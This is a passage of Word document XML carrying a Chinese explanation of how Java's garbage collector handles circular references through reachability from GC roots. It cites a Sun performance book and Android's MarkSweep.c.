          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>垃圾回收机制究竟能否解决循环引用这一困境，带着这个疑问找了一些资料，找到了一个比较满意的解释。在《</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java Platform Performance: Strategies and Tactics</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>》这本书的附录</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中有一处说明，这本书出自</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sun</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>公司</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>团队员工，应该算比较权威的。其中有这样一段（</w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:anchor="997428" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="286446"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://java.sun.com/docs/books/performance/1st_edition/html/JPAppGC.fm.html#997428</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“It's important to note that not just any strong reference will hold an object in memory. These must be references that chain from a garbage collection root. GC roots are a special class of variable that includes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Temporary variables on the stack (of any thread)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Static variables (from any class)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Special references from JNI native code”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这段话可以简单的理解就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>强引用并不能保证对象不被回收</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。垃圾回收机制除了检查对象是否被引用外，还要看对象是否被至少一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GC roots</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象直接或者间接引用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GC roots</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象包括以下一些类容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每个线程当前的函数调用栈，从栈顶到栈底的每个函数里的局部变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>静态的变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jni</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中引用到的变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以，上面例子中两个循环引用的对象，虽然都存在一个强引用，但是不被任何</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GC root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象直接或者间接引用到，垃圾回收机制能够发现这个问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>另外，为了验证这一点，特意翻看了一下</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>android</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>源码中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>管理这一块的代码。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MarkSweep.c</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这文件中，有一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>void dvmHeapMarkRootSet()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数，这个函数对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GC root</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象，有一些详细的说明，有兴趣的可以细看一下。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>       </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对于循环引用有一套自己的解决方案。但是话又说回来，一般实际编码中出现的循环引用不会是上面那个例子那样明显，一般都是多个对象复杂的引用导致的循环，这个时候，如果一个对象的生命周期很长，就会导致多个对象都释放不了，所以还是要特别留意对象之间的引用关系。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00037103" w:rsidRPr="00F41A4C" w:rsidRDefault="00037103" w:rsidP="004E31AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00037103" w:rsidRPr="00F41A4C" w:rsidRDefault="00037103" w:rsidP="00037103">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对没有</w:t>
      </w:r>
      <w:r w:rsidR="00E82DC3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>那些</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根引用的对象进行来及回收，也就是无法从根对象中追述的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00037103" w:rsidRPr="00F41A4C" w:rsidRDefault="00037103" w:rsidP="00037103">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>垃圾回收的根对象的范围有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00037103" w:rsidRPr="00F41A4C" w:rsidRDefault="00037103" w:rsidP="00037103">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
